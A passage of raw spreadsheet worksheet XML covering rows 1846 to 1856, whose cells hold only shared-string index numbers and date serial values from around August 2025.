        <v>8546</v>
      </c>
      <c r="F1846" s="23" t="s">
        <v>11482</v>
      </c>
      <c r="G1846" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1846" s="23"/>
      <c r="I1846" s="23" t="s">
        <v>8479</v>
      </c>
      <c r="J1846" s="23" t="s">
        <v>11483</v>
      </c>
      <c r="K1846" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L1846" s="24">
        <v>45873.0236689815</v>
      </c>
      <c r="M1846" s="24">
        <v>45873.0236689815</v>
      </c>
      <c r="N1846" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1846" s="23" t="s">
        <v>11484</v>
      </c>
      <c r="P1846" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="Q1846" s="23"/>
      <c r="R1846" s="23" t="s">
        <v>3034</v>
      </c>
      <c r="S1846" s="23" t="s">
        <v>11485</v>
      </c>
      <c r="T1846" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U1846" s="23" t="s">
        <v>8679</v>
      </c>
      <c r="V1846" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1846" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1846" s="23" t="s">
        <v>8600</v>
      </c>
      <c r="Y1846" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1846" s="24">
        <v>45873.0255439815</v>
      </c>
      <c r="AA1846" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1846" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1846" s="23"/>
      <c r="AD1846" s="23" t="s">
        <v>8437</v>
      </c>
      <c r="AE1846" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF1846" s="23"/>
      <c r="AG1846" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1846" s="24">
        <v>45873.0255787037</v>
      </c>
      <c r="AI1846" s="23"/>
      <c r="AJ1846" s="23"/>
      <c r="AK1846" s="23" t="s">
        <v>11486</v>
      </c>
      <c r="AL1846" s="23" t="s">
        <v>11487</v>
      </c>
      <c r="AM1846" s="23" t="s">
        <v>8487</v>
      </c>
      <c r="AN1846" s="23"/>
      <c r="AO1846" s="23"/>
      <c r="AP1846" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1846" s="24">
        <v>45873.0463773148</v>
      </c>
      <c r="AR1846" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS1846" s="23"/>
      <c r="AT1846" s="23"/>
      <c r="AU1846" s="23"/>
    </row>
    <row r="1847" s="1" customFormat="1" spans="1:47">
      <c r="A1847" s="23" t="s">
        <v>11488</v>
      </c>
      <c r="B1847" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C1847" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="D1847" s="23" t="s">
        <v>8427</v>
      </c>
      <c r="E1847" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1847" s="23" t="s">
        <v>11489</v>
      </c>
      <c r="G1847" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1847" s="23"/>
      <c r="I1847" s="23" t="s">
        <v>8429</v>
      </c>
      <c r="J1847" s="23" t="s">
        <v>9261</v>
      </c>
      <c r="K1847" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L1847" s="24">
        <v>45860.3209259259</v>
      </c>
      <c r="M1847" s="24">
        <v>45872.3233449074</v>
      </c>
      <c r="N1847" s="23" t="s">
        <v>8809</v>
      </c>
      <c r="O1847" s="23" t="s">
        <v>11490</v>
      </c>
      <c r="P1847" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="Q1847" s="23"/>
      <c r="R1847" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="S1847" s="23" t="s">
        <v>8492</v>
      </c>
      <c r="T1847" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U1847" s="23" t="s">
        <v>8591</v>
      </c>
      <c r="V1847" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W1847" s="23" t="s">
        <v>123</v>
      </c>
      <c r="X1847" s="23" t="s">
        <v>8436</v>
      </c>
      <c r="Y1847" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1847" s="24">
        <v>45872.2088541667</v>
      </c>
      <c r="AA1847" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1847" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1847" s="23"/>
      <c r="AD1847" s="23" t="s">
        <v>8437</v>
      </c>
      <c r="AE1847" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF1847" s="23"/>
      <c r="AG1847" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1847" s="24">
        <v>45872.2088773148</v>
      </c>
      <c r="AI1847" s="23"/>
      <c r="AJ1847" s="23"/>
      <c r="AK1847" s="23" t="s">
        <v>11491</v>
      </c>
      <c r="AL1847" s="23" t="s">
        <v>4354</v>
      </c>
      <c r="AM1847" s="23" t="s">
        <v>8495</v>
      </c>
      <c r="AN1847" s="23"/>
      <c r="AO1847" s="23"/>
      <c r="AP1847" s="23" t="s">
        <v>8664</v>
      </c>
      <c r="AQ1847" s="24">
        <v>45872.2192708333</v>
      </c>
      <c r="AR1847" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS1847" s="23"/>
      <c r="AT1847" s="23"/>
      <c r="AU1847" s="23"/>
    </row>
    <row r="1848" s="1" customFormat="1" spans="1:47">
      <c r="A1848" s="23" t="s">
        <v>11488</v>
      </c>
      <c r="B1848" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C1848" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="D1848" s="23" t="s">
        <v>11473</v>
      </c>
      <c r="E1848" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1848" s="23" t="s">
        <v>11492</v>
      </c>
      <c r="G1848" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1848" s="23"/>
      <c r="I1848" s="23" t="s">
        <v>8429</v>
      </c>
      <c r="J1848" s="23" t="s">
        <v>11493</v>
      </c>
      <c r="K1848" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L1848" s="24">
        <v>45860.3209259259</v>
      </c>
      <c r="M1848" s="24">
        <v>45872.205775463</v>
      </c>
      <c r="N1848" s="23" t="s">
        <v>8809</v>
      </c>
      <c r="O1848" s="23" t="s">
        <v>11494</v>
      </c>
      <c r="P1848" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1848" s="23"/>
      <c r="R1848" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="S1848" s="23" t="s">
        <v>3361</v>
      </c>
      <c r="T1848" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U1848" s="23" t="s">
        <v>8591</v>
      </c>
      <c r="V1848" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1848" s="23" t="s">
        <v>123</v>
      </c>
      <c r="X1848" s="23" t="s">
        <v>8436</v>
      </c>
      <c r="Y1848" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1848" s="24">
        <v>45872.2062037037</v>
      </c>
      <c r="AA1848" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1848" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1848" s="23"/>
      <c r="AD1848" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE1848" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF1848" s="23"/>
      <c r="AG1848" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1848" s="24">
        <v>45872.2062384259</v>
      </c>
      <c r="AI1848" s="23"/>
      <c r="AJ1848" s="23"/>
      <c r="AK1848" s="23" t="s">
        <v>11495</v>
      </c>
      <c r="AL1848" s="23" t="s">
        <v>4239</v>
      </c>
      <c r="AM1848" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1848" s="23"/>
      <c r="AO1848" s="23"/>
      <c r="AP1848" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1848" s="24">
        <v>45872.227037037</v>
      </c>
      <c r="AR1848" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS1848" s="23"/>
      <c r="AT1848" s="23"/>
      <c r="AU1848" s="23"/>
    </row>
    <row r="1849" s="1" customFormat="1" spans="1:47">
      <c r="A1849" s="23" t="s">
        <v>11488</v>
      </c>
      <c r="B1849" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C1849" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="D1849" s="23" t="s">
        <v>8687</v>
      </c>
      <c r="E1849" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1849" s="23" t="s">
        <v>11496</v>
      </c>
      <c r="G1849" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1849" s="23"/>
      <c r="I1849" s="23" t="s">
        <v>8429</v>
      </c>
      <c r="J1849" s="23" t="s">
        <v>11497</v>
      </c>
      <c r="K1849" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L1849" s="24">
        <v>45860.3209259259</v>
      </c>
      <c r="M1849" s="24">
        <v>45872.205775463</v>
      </c>
      <c r="N1849" s="23" t="s">
        <v>8809</v>
      </c>
      <c r="O1849" s="23" t="s">
        <v>11490</v>
      </c>
      <c r="P1849" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q1849" s="23"/>
      <c r="R1849" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="S1849" s="23" t="s">
        <v>3361</v>
      </c>
      <c r="T1849" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U1849" s="23" t="s">
        <v>8591</v>
      </c>
      <c r="V1849" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1849" s="23" t="s">
        <v>123</v>
      </c>
      <c r="X1849" s="23" t="s">
        <v>8436</v>
      </c>
      <c r="Y1849" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1849" s="24">
        <v>45872.206875</v>
      </c>
      <c r="AA1849" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1849" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1849" s="23"/>
      <c r="AD1849" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE1849" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF1849" s="23"/>
      <c r="AG1849" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1849" s="24">
        <v>45872.2069097222</v>
      </c>
      <c r="AI1849" s="23"/>
      <c r="AJ1849" s="23"/>
      <c r="AK1849" s="23" t="s">
        <v>11498</v>
      </c>
      <c r="AL1849" s="23" t="s">
        <v>4239</v>
      </c>
      <c r="AM1849" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1849" s="23"/>
      <c r="AO1849" s="23"/>
      <c r="AP1849" s="23" t="s">
        <v>8664</v>
      </c>
      <c r="AQ1849" s="24">
        <v>45872.2172916667</v>
      </c>
      <c r="AR1849" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS1849" s="23"/>
      <c r="AT1849" s="23"/>
      <c r="AU1849" s="23"/>
    </row>
    <row r="1850" s="1" customFormat="1" spans="1:47">
      <c r="A1850" s="23" t="s">
        <v>11488</v>
      </c>
      <c r="B1850" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C1850" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="D1850" s="23" t="s">
        <v>11473</v>
      </c>
      <c r="E1850" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1850" s="23" t="s">
        <v>11499</v>
      </c>
      <c r="G1850" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1850" s="23"/>
      <c r="I1850" s="23" t="s">
        <v>8429</v>
      </c>
      <c r="J1850" s="23" t="s">
        <v>11500</v>
      </c>
      <c r="K1850" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L1850" s="24">
        <v>45860.3209259259</v>
      </c>
      <c r="M1850" s="24">
        <v>45872.2030439815</v>
      </c>
      <c r="N1850" s="23" t="s">
        <v>8809</v>
      </c>
      <c r="O1850" s="23" t="s">
        <v>11494</v>
      </c>
      <c r="P1850" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1850" s="23"/>
      <c r="R1850" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="S1850" s="23" t="s">
        <v>3361</v>
      </c>
      <c r="T1850" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U1850" s="23" t="s">
        <v>8591</v>
      </c>
      <c r="V1850" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1850" s="23" t="s">
        <v>123</v>
      </c>
      <c r="X1850" s="23" t="s">
        <v>8436</v>
      </c>
      <c r="Y1850" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1850" s="24">
        <v>45872.2034606481</v>
      </c>
      <c r="AA1850" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1850" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1850" s="23"/>
      <c r="AD1850" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE1850" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF1850" s="23"/>
      <c r="AG1850" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1850" s="24">
        <v>45872.2034953704</v>
      </c>
      <c r="AI1850" s="23"/>
      <c r="AJ1850" s="23"/>
      <c r="AK1850" s="23" t="s">
        <v>11501</v>
      </c>
      <c r="AL1850" s="23" t="s">
        <v>4239</v>
      </c>
      <c r="AM1850" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1850" s="23"/>
      <c r="AO1850" s="23"/>
      <c r="AP1850" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1850" s="24">
        <v>45872.2242939815</v>
      </c>
      <c r="AR1850" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS1850" s="23"/>
      <c r="AT1850" s="23"/>
      <c r="AU1850" s="23"/>
    </row>
    <row r="1851" s="1" customFormat="1" spans="1:47">
      <c r="A1851" s="23" t="s">
        <v>11488</v>
      </c>
      <c r="B1851" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C1851" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="D1851" s="23" t="s">
        <v>8687</v>
      </c>
      <c r="E1851" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1851" s="23" t="s">
        <v>11502</v>
      </c>
      <c r="G1851" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1851" s="23"/>
      <c r="I1851" s="23" t="s">
        <v>8429</v>
      </c>
      <c r="J1851" s="23" t="s">
        <v>11503</v>
      </c>
      <c r="K1851" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L1851" s="24">
        <v>45860.3209259259</v>
      </c>
      <c r="M1851" s="24">
        <v>45872.1997569444</v>
      </c>
      <c r="N1851" s="23" t="s">
        <v>8809</v>
      </c>
      <c r="O1851" s="23" t="s">
        <v>11490</v>
      </c>
      <c r="P1851" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1851" s="23"/>
      <c r="R1851" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="S1851" s="23" t="s">
        <v>3361</v>
      </c>
      <c r="T1851" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U1851" s="23" t="s">
        <v>8591</v>
      </c>
      <c r="V1851" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1851" s="23" t="s">
        <v>123</v>
      </c>
      <c r="X1851" s="23" t="s">
        <v>8436</v>
      </c>
      <c r="Y1851" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1851" s="24">
        <v>45872.2006365741</v>
      </c>
      <c r="AA1851" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1851" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1851" s="23"/>
      <c r="AD1851" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE1851" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF1851" s="23"/>
      <c r="AG1851" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1851" s="24">
        <v>45872.2006828704</v>
      </c>
      <c r="AI1851" s="23"/>
      <c r="AJ1851" s="23"/>
      <c r="AK1851" s="23" t="s">
        <v>11504</v>
      </c>
      <c r="AL1851" s="23" t="s">
        <v>4239</v>
      </c>
      <c r="AM1851" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1851" s="23"/>
      <c r="AO1851" s="23"/>
      <c r="AP1851" s="23" t="s">
        <v>8664</v>
      </c>
      <c r="AQ1851" s="24">
        <v>45872.2110532407</v>
      </c>
      <c r="AR1851" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS1851" s="23"/>
      <c r="AT1851" s="23"/>
      <c r="AU1851" s="23"/>
    </row>
    <row r="1852" s="1" customFormat="1" spans="1:47">
      <c r="A1852" s="23" t="s">
        <v>11488</v>
      </c>
      <c r="B1852" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C1852" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="D1852" s="23" t="s">
        <v>11473</v>
      </c>
      <c r="E1852" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1852" s="23" t="s">
        <v>11505</v>
      </c>
      <c r="G1852" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1852" s="23"/>
      <c r="I1852" s="23" t="s">
        <v>8429</v>
      </c>
      <c r="J1852" s="23" t="s">
        <v>11506</v>
      </c>
      <c r="K1852" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L1852" s="24">
        <v>45860.3209259259</v>
      </c>
      <c r="M1852" s="24">
        <v>45872.1975115741</v>
      </c>
      <c r="N1852" s="23" t="s">
        <v>8809</v>
      </c>
      <c r="O1852" s="23" t="s">
        <v>11494</v>
      </c>
      <c r="P1852" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1852" s="23"/>
      <c r="R1852" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="S1852" s="23" t="s">
        <v>3361</v>
      </c>
      <c r="T1852" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U1852" s="23" t="s">
        <v>8591</v>
      </c>
      <c r="V1852" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1852" s="23" t="s">
        <v>123</v>
      </c>
      <c r="X1852" s="23" t="s">
        <v>8436</v>
      </c>
      <c r="Y1852" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1852" s="24">
        <v>45872.1979398148</v>
      </c>
      <c r="AA1852" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1852" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1852" s="23"/>
      <c r="AD1852" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE1852" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF1852" s="23"/>
      <c r="AG1852" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1852" s="24">
        <v>45872.197974537</v>
      </c>
      <c r="AI1852" s="23"/>
      <c r="AJ1852" s="23"/>
      <c r="AK1852" s="23" t="s">
        <v>11507</v>
      </c>
      <c r="AL1852" s="23" t="s">
        <v>4239</v>
      </c>
      <c r="AM1852" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1852" s="23"/>
      <c r="AO1852" s="23"/>
      <c r="AP1852" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1852" s="24">
        <v>45872.2187731481</v>
      </c>
      <c r="AR1852" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS1852" s="23"/>
      <c r="AT1852" s="23"/>
      <c r="AU1852" s="23"/>
    </row>
    <row r="1853" s="1" customFormat="1" spans="1:47">
      <c r="A1853" s="23" t="s">
        <v>11488</v>
      </c>
      <c r="B1853" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C1853" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="D1853" s="23" t="s">
        <v>8687</v>
      </c>
      <c r="E1853" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1853" s="23" t="s">
        <v>11508</v>
      </c>
      <c r="G1853" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1853" s="23"/>
      <c r="I1853" s="23" t="s">
        <v>8429</v>
      </c>
      <c r="J1853" s="23" t="s">
        <v>11509</v>
      </c>
      <c r="K1853" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L1853" s="24">
        <v>45860.3209259259</v>
      </c>
      <c r="M1853" s="24">
        <v>45872.1975115741</v>
      </c>
      <c r="N1853" s="23" t="s">
        <v>8809</v>
      </c>
      <c r="O1853" s="23" t="s">
        <v>11490</v>
      </c>
      <c r="P1853" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q1853" s="23"/>
      <c r="R1853" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="S1853" s="23" t="s">
        <v>3361</v>
      </c>
      <c r="T1853" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U1853" s="23" t="s">
        <v>8591</v>
      </c>
      <c r="V1853" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1853" s="23" t="s">
        <v>123</v>
      </c>
      <c r="X1853" s="23" t="s">
        <v>8436</v>
      </c>
      <c r="Y1853" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1853" s="24">
        <v>45872.1987152778</v>
      </c>
      <c r="AA1853" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1853" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1853" s="23"/>
      <c r="AD1853" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE1853" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF1853" s="23"/>
      <c r="AG1853" s="25" t="s">
        <v>8439</v>
      </c>
      <c r="AH1853" s="24">
        <v>45872.1987731481</v>
      </c>
      <c r="AI1853" s="23"/>
      <c r="AJ1853" s="23"/>
      <c r="AK1853" s="23" t="s">
        <v>11510</v>
      </c>
      <c r="AL1853" s="23" t="s">
        <v>4239</v>
      </c>
      <c r="AM1853" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1853" s="23"/>
      <c r="AO1853" s="23"/>
      <c r="AP1853" s="23" t="s">
        <v>8664</v>
      </c>
      <c r="AQ1853" s="24">
        <v>45872.2091319444</v>
      </c>
      <c r="AR1853" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS1853" s="23"/>
      <c r="AT1853" s="23"/>
      <c r="AU1853" s="23"/>
    </row>
    <row r="1854" s="1" customFormat="1" spans="1:47">
      <c r="A1854" s="23" t="s">
        <v>11488</v>
      </c>
      <c r="B1854" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C1854" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="D1854" s="23" t="s">
        <v>11473</v>
      </c>
      <c r="E1854" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1854" s="23" t="s">
        <v>11511</v>
      </c>
      <c r="G1854" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1854" s="23"/>
      <c r="I1854" s="23" t="s">
        <v>8429</v>
      </c>
      <c r="J1854" s="23" t="s">
        <v>11512</v>
      </c>
      <c r="K1854" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L1854" s="24">
        <v>45860.3209259259</v>
      </c>
      <c r="M1854" s="24">
        <v>45872.1948842593</v>
      </c>
      <c r="N1854" s="23" t="s">
        <v>8809</v>
      </c>
      <c r="O1854" s="23" t="s">
        <v>11494</v>
      </c>
      <c r="P1854" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1854" s="23"/>
      <c r="R1854" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="S1854" s="23" t="s">
        <v>3361</v>
      </c>
      <c r="T1854" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U1854" s="23" t="s">
        <v>8591</v>
      </c>
      <c r="V1854" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1854" s="23" t="s">
        <v>123</v>
      </c>
      <c r="X1854" s="23" t="s">
        <v>8436</v>
      </c>
      <c r="Y1854" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1854" s="24">
        <v>45872.1951273148</v>
      </c>
      <c r="AA1854" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1854" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1854" s="23"/>
      <c r="AD1854" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE1854" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF1854" s="23"/>
      <c r="AG1854" s="25" t="s">
        <v>8439</v>
      </c>
      <c r="AH1854" s="24">
        <v>45872.1951851852</v>
      </c>
      <c r="AI1854" s="23"/>
      <c r="AJ1854" s="23"/>
      <c r="AK1854" s="23" t="s">
        <v>11513</v>
      </c>
      <c r="AL1854" s="23" t="s">
        <v>4239</v>
      </c>
      <c r="AM1854" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1854" s="23"/>
      <c r="AO1854" s="23"/>
      <c r="AP1854" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1854" s="24">
        <v>45872.2159606482</v>
      </c>
      <c r="AR1854" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS1854" s="23"/>
      <c r="AT1854" s="23"/>
      <c r="AU1854" s="23"/>
    </row>
    <row r="1855" s="1" customFormat="1" spans="1:47">
      <c r="A1855" s="23" t="s">
        <v>11488</v>
      </c>
      <c r="B1855" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C1855" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="D1855" s="23" t="s">
        <v>11473</v>
      </c>
      <c r="E1855" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1855" s="23" t="s">
        <v>11514</v>
      </c>
      <c r="G1855" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1855" s="23"/>
      <c r="I1855" s="23" t="s">
        <v>8429</v>
      </c>
      <c r="J1855" s="23" t="s">
        <v>11515</v>
      </c>
      <c r="K1855" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L1855" s="24">
        <v>45860.3209259259</v>
      </c>
      <c r="M1855" s="24">
        <v>45872.1906365741</v>
      </c>
      <c r="N1855" s="23" t="s">
        <v>8809</v>
      </c>
      <c r="O1855" s="23" t="s">
        <v>11494</v>
      </c>
      <c r="P1855" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="Q1855" s="23"/>
      <c r="R1855" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="S1855" s="23" t="s">
        <v>3361</v>
      </c>
      <c r="T1855" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U1855" s="23" t="s">
        <v>8591</v>
      </c>
      <c r="V1855" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1855" s="23" t="s">
        <v>123</v>
      </c>
      <c r="X1855" s="23" t="s">
        <v>8436</v>
      </c>
      <c r="Y1855" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1855" s="24">
        <v>45872.1924652778</v>
      </c>
      <c r="AA1855" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1855" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1855" s="23"/>
      <c r="AD1855" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE1855" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF1855" s="23"/>
      <c r="AG1855" s="25" t="s">
        <v>8475</v>
      </c>
      <c r="AH1855" s="24">
        <v>45872.1925115741</v>
      </c>
      <c r="AI1855" s="23"/>
      <c r="AJ1855" s="23"/>
      <c r="AK1855" s="23" t="s">
        <v>11516</v>
      </c>
      <c r="AL1855" s="23" t="s">
        <v>4239</v>
      </c>
      <c r="AM1855" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1855" s="23"/>
      <c r="AO1855" s="23"/>
      <c r="AP1855" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1855" s="24">
        <v>45872.2132986111</v>
      </c>
      <c r="AR1855" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS1855" s="23"/>
      <c r="AT1855" s="23"/>
      <c r="AU1855" s="23"/>
    </row>
    <row r="1856" s="1" customFormat="1" spans="1:47">
      <c r="A1856" s="23" t="s">
        <v>11357</v>
      </c>
      <c r="B1856" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C1856" s="23" t="s">
        <v>11517</v>
      </c>
      <c r="D1856" s="23" t="s">
        <v>11359</v>
      </c>
      <c r="E1856" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1856" s="23" t="s">
        <v>11518</v>
      </c>
      <c r="G1856" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1856" s="23"/>
      <c r="I1856" s="23" t="s">
        <v>8479</v>
      </c>
      <c r="J1856" s="23" t="s">
        <v>11519</v>
      </c>
      <c r="K1856" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L1856" s="24">
        <v>45870.6060532407</v>
      </c>
      <c r="M1856" s="24">
        <v>45871.5763425926</v>
      </c>
      <c r="N1856" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O1856" s="23" t="s">
        <v>11520</v>
      </c>
      <c r="P1856" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="Q1856" s="23"/>
      <c r="R1856" s="23" t="s">
        <v>11517</v>
      </c>
      <c r="S1856" s="23" t="s">
        <v>11521</v>
      </c>
      <c r="T1856" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U1856" s="23" t="s">
        <v>11364</v>
      </c>
      <c r="V1856" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W1856" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X1856" s="23" t="s">
        <v>9079</v>
      </c>
      <c r="Y1856" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1856" s="24">
        <v>45871.5828703704</v>
      </c>
      <c r="AA1856" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1856" s="23" t="s">
        <v>8391</v>
      </c>
